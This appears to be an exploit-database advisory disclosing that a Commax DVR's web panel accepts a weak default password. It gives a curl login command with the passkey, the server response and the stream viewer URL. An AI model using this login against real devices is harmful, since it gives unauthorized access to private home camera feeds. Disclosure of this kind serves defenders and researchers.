Exploits / Vulnerability Discovered : 2021-08-16 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Commax cvdaxx dvr 5.1.4 weak default credentials stream disclosure is for educational purposes only and if it is used you will do on your own risk!
Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer
needs and convenience in single or multi-family homes.
Desc: The web control panel uses weak set of default administrative credentials that
can be easily guessed in remote password attacks and disclose RTSP stream.
Tested on: Boa/0.94.14rc19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Login:
$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"
HTTP/1.1 200 OK
Date: Mon, 16 Aug 2021 01:04:52 GMT
Server: Boa/0.94.14rc19
Accept-Ranges: bytes
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
IE (ActiveX) web player:
http://192.168.1.2/web_viewer2.html